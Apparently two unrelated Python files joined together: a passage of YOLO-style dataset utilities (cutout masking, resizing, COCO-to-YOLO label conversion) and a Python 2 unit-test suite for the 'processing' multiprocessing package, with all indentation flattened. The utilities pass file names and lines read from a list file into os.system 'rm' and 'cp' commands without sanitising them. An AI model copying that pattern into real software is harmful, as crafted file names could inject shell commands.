# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def preprocess_help(data, datatype='train'):
if (datatype == 'train'):
curpath = 'trainAnnotationPath'
curtype = 'train'
elif (datatype == 'val'):
curpath = 'validationAnnotationPath'
curtype = 'val'
else:
curpath = 'testAnnotationPath'
curtype = 'test'
names = []
if (hasattr(data, curpath)):
annotation_path = getattr(data, curpath)
with open(annotation_path) as f:
train_data = json.load(f)
categories = train_data['categories']
for i in range(len(categories)):
names.append(categories[i]['name'])
nc = len(names)
rootDir = Path(annotation_path).parent.parent
os.makedirs(os.path.join(rootDir, 'images', curtype), exist_ok=True)
os.makedirs(os.path.join(rootDir, 'labels', curtype), exist_ok=True)
file_names = os.listdir(Path(annotation_path).parent)
for file_name in file_names:
shutil.move(os.path.join(Path(annotation_path).parent, file_name), os.path.join(rootDir, 'images', curtype))
for i in range(len(file_names)):
file_name = file_names[i]
try:
image = next(x for x in train_data['images'] if x['file_name'] == file_name)
image_id = image['id']
width = image['width']
height = image['height']
annotations = list(filter(lambda x: x['image_id'] == image_id, train_data['annotations']))
lines = []
for j in range(len(annotations)):
annotation = annotations[j]
category = annotation['category_id']
category_name = next(x for x in train_data['categories'] if x['id'] == category)['name']
categoryid = names.index(category_name)
x, y, widthl, heightl = annotation['bbox']
lines.append('%d %f %f %f %f' % (categoryid, (x + widthl / 2) / width, (y + heightl / 2) / height, widthl / width, heightl / height))
for j in range(len(lines)):
line = lines[j]
with open(os.path.join(rootDir, 'labels', curtype, file_name.split('.')[0] + '.txt'), 'a+') as f:
f.write(line + '\n')
except Exception as e:
pass
return names, rootDir
def preprocess(data):
names, trainRootDir = preprocess_help(data, 'train')
valnames, valRootDir = preprocess_help(data, 'val')
testnames, testRootDir = preprocess_help(data, 'test')
test = val = train = os.path.join(trainRootDir, 'images', 'train')
if (len(valnames) > 0):
val = os.path.join(valRootDir, 'images', 'val')
if (len(testnames) > 0):
test = os.path.join(testRootDir, 'images', 'test')
data_config = {
'train': train,
'val': val,
'test': test,
'nc': len(names),
'names': names
}
yamlC = yaml.dump(data_config)
with open(os.path.join(trainRootDir, 'data.yaml'), 'w+') as f:
f.write(yamlC)
return os.path.join(trainRootDir, 'data.yaml')
|
__init__.py
|
#
# Unit tests for processing package
#
import unittest
import threading
import Queue
import time
import sys
import os
import signal
import array
import copy
import socket
import random
import logging
import ctypes
import processing.dummy
import processing.connection
import processing.managers
import processing.heap
import processing.managers
import processing.pool
#
# Constants
#
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(processing._processing,
'HAVE_BROKEN_SEM_GETVALUE', False)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
#
# Return the value of a semaphore
#
def getValue(self):
try:
return self.getValue()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
current = self.currentProcess()
self.assertTrue(current.isAlive())
self.assertTrue(not current.isDaemon())
if self.TYPE != 'threads':
authkey = current.getAuthKey()
self.assertTrue(type(authkey) is str)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.getPid(), os.getpid())
self.assertEqual(current.getExitCode(), None)
def _test(self, q, *args, **kwds):
current = self.currentProcess()
q.put(args)
q.put(kwds)
q.put(current.getName())
if self.TYPE != 'threads':
q.put(current.getAuthKey())
q.put(current.getPid())
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.setDaemon(True)
current = self.currentProcess()
if self.TYPE != 'threads':
self.assertEquals(p.getAuthKey(), current.getAuthKey())
self.assertEquals(p.isAlive(), False)
self.assertEquals(p.isDaemon(), True)
self.assertTrue(p not in self.activeChildren())
self.assertTrue(type(self.activeChildren()) is list)
self.assertEqual(p.getExitCode(), None)
p.start()
self.assertEquals(p.getExitCode(), None)
self.assertEquals(p.isAlive(), True)
self.assertTrue(p in self.activeChildren())
self.assertEquals(q.get(), args[1:])
self.assertEquals(q.get(), kwargs)
self.assertEquals(q.get(), p.getName())
if self.TYPE != 'threads':
self.assertEquals(q.get(), current.getAuthKey())
self.assertEquals(q.get(), p.getPid())
p.join()
self.assertEquals(p.getExitCode(), 0)
self.assertEquals(p.isAlive(), False)
self.assertTrue(p not in self.activeChildren())
def _test_terminate(self):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.setDaemon(True)
p.start()
self.assertEqual(p.isAlive(), True)
self.assertTrue(p in self.activeChildren())
self.assertEqual(p.getExitCode(), None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.isAlive(), False)
self.assertTrue(p not in self.activeChildren())
p.join()
# XXX sometimes get p.getExitCode() == 0 on Windows ...
#self.assertEqual(p.getExitCode(), -signal.SIGTERM)
def test_cpuCount(self):
try:
cpus = processing.cpuCount()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_activeChildren(self):
self.assertEqual(type(self.activeChildren()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertTrue(p not in self.activeChildren())
p.start()
self.assertTrue(p in self.activeChildren())
p.join()
self.assertTrue(p not in self.activeChildren())
def _test_recursion(self, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = self.Process(
target=self._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
#
#
#
class _UpperCaser(processing.Process):
def __init__(self):
processing.Process.__init__(self)
self.child_conn, self.parent_conn = processing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
#
#
#
class _TestQueue(BaseTestCase):
def _test_put(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
queue = self.Queue(maxsize=6)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.setDaemon(True)
proc.start()
self.assertEqual(queue.empty(), True)
self.assertEqual(queue.full(), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue.empty(), False)
self.assertEqual(queue.full(), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue.empty(), True)
self.assertEqual(queue.full(), False)
proc.join()
def _test_get(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
queue.put(1)
queue.put(2)
if self.TYPE == 'processes':
queue.putmany([3, 4, 5])
else:
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.setDaemon(True)
proc.start()
self.assertEqual(queue.empty(), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue.empty(), False)
self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue.empty(), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
def _test_fork(self, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, getValue, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, getValue, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, getValue, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, getValue, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, getValue, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, getValue, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, getValue, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, getValue, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
if HAVE_GETVALUE:
self.assertRaises(ValueError, sem.release)
self.assertReturnsIfImplemented(2, getValue, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
def f(self, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.getValue() -
cond._woken_count.getValue())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.getValue(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.setDaemon(True)
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.setDaemon(True)
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, getValue, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, getValue, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, getValue, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notifyAll(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.setDaemon(True)
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.setDaemon(True)
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, getValue, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.setDaemon(True)
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.setDaemon(True)
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, getValue, woken)
# wake them all up
cond.acquire()
cond.notifyAll()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, getValue, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
def _test_event(self, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
self.assertEqual(event.isSet(), False)
self.assertEqual(wait(0.0), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
self.assertEqual(event.isSet(), True)
self.assertEqual(wait(), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(event.isSet(), True)
event.clear()
self.assertEqual(event.isSet(), False)
self.Process(target=self._test_event, args=(event,)).start()
self.assertEqual(wait(), None)
#
#
#
class _TestValue(BaseTestCase):
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', 'x', 'y'),
]
def _test(self, values):
for sv, cv in zip(values, self.codes_values):
sv.value = cv[2]
def test_sharedvalue(self, lock=False):
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_synchronized(self):
self.test_sharedvalue(lock=True)
def test_getobj_getlock(self):
if self.TYPE != 'processes':
return
lock = self.Lock()
obj = self.Value('i', 5, lock=lock)
self.assertEqual(obj.getlock(), lock)
self.assertEqual(obj.getobj().value, 5)
class _TestArray(BaseTestCase):
def f(self, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
def test_sharedarray(self, lock=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
arr = self.Array('i', seq, lock=lock)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.start()
p.join()
self.assertEqual(list(arr), list(seq))
def test_synchronized(self):
self.test_sharedarray(lock=True)
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a, self.list(range(10)))
self.assertEqual(a, range(10))
self.assertTrue(a != range(11))
self.assertTrue(range(9) < a)
self.assertTrue(a < range(11))
d = [a, b]
e = self.list(d)
self.assertEqual(
e, [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
it = iter(a)
self.assertEqual(tuple(it), (0, 1, 2, 3, 4, 5, 6, 7, 8, 9))
f = self.list([a])
a.append('hello')
self.assertEqual(f, [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
for i in range(5):
d[i] = chr(65 + i)
self.assertEqual(
d, {0: 'A', 1: 'B', 2: 'C', 3: 'D', 4: 'E'}
)
self.assertEqual(list(d), range(5))
self.assertEqual(
list(d.iteritems()),
[(0, 'A'), (1, 'B'), (2, 'C'), (3, 'D'), (4, 'E')]
)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
class _TestPool(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), apply(sqr, (5,)))
self.assertEqual(papply(sqr, (), {'x':3}), apply(sqr, (), {'x':3}))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_async(self):
res = self.pool.applyAsync(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.applyAsync(sqr, (6, 100))
get = TimingWrapper(res.get)
self.assertRaises(processing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
# One of the workers will be occupied a long time (probably
# till the pool gets terminated), but there are other workers
# so who cares.
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imapUnordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imapUnordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
p = processing.Pool(3)
self.assertEqual(3, len(p._pool))
#
#
#
class _TestZZZDebugInfo(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_debug_info(self):
# this gets run after all the other tests for the manager
# and it tests that there have been no reference leaks for
# the managers shared objects
debug = self._debugInfo()
if debug:
print debug
self.assertTrue(not debug)
#
#
#
from processing.managers import (
BaseManager, BaseProxy, CreatorMethod, RemoteError
)
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i*i
class IteratorProxy(BaseProxy):
def __iter__(self):
return self
def next(self):
return self._callMethod('next')
class MyManager(BaseManager):
Foo = CreatorMethod(FooBar)
Bar = CreatorMethod(FooBar, exposed=('f', '_h'))
baz = CreatorMethod(baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callMethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callMethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callMethod('f'), 'f()')
self.assertEqual(bar._callMethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
manager.shutdown()
#
#
#
_queue = Queue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
# manager class used by server process
get_proxy = CreatorMethod(callable=get_queue, typeid='get_proxy')
class QueueManager2(BaseManager):
# manager class which specifies the same interface as QueueManager
get_proxy = CreatorMethod(typeid='get_proxy')
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def _putter(self, address):
m2 = QueueManager2.fromAddress(address=address, authkey='none')
queue = m2.get_proxy()
queue.put('hello world')
def test_remote(self):
m = QueueManager(address=('localhost', 0), authkey='none')
m.start()
p = self.Process(target=self._putter, args=(m.address,))
p.start()
m2 = QueueManager2.fromAddress(address=m.address, authkey='none')
queue = m2.get_proxy()
self.assertEqual(queue.get(), 'hello world')
# Since queue was not created using m it has no way of knowing
# when the server process associated with m has been
# finalized. Therefore we should take care that queue is
# finalized before m is finalized. Otherwise the finalizer
# for queue can hang for a few seconds (on Windows) while it
# tries to contact the manager process (which is no longer
# running) in order to decrement the reference count.
del queue
del m
#
#
#
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _echo(self, conn):
for msg in iter(conn.recvBytes, ''):
conn.sendBytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.setDaemon(True)
p.start()
seq = [1, 2.25, None]
msg = 'hello world'
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.sendBytes(msg), None)
self.assertEqual(conn.recvBytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.sendBytes(arr), None)
self.assertEqual(conn.recvBytesInto(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.sendBytes(arr), None)
self.assertEqual(conn.recvBytesInto(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('c', ' ' * 40)
self.assertEqual(conn.sendBytes(longmsg), None)
try:
res = conn.recvBytesInto(buffer)
except processing.BufferTooShort, e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = 'X' * (1024 * 1024 * 16) # 16 megabytes
conn.sendBytes(really_big_msg)
self.assertEqual(conn.recvBytes(), really_big_msg)
conn.sendBytes('') # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recvBytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
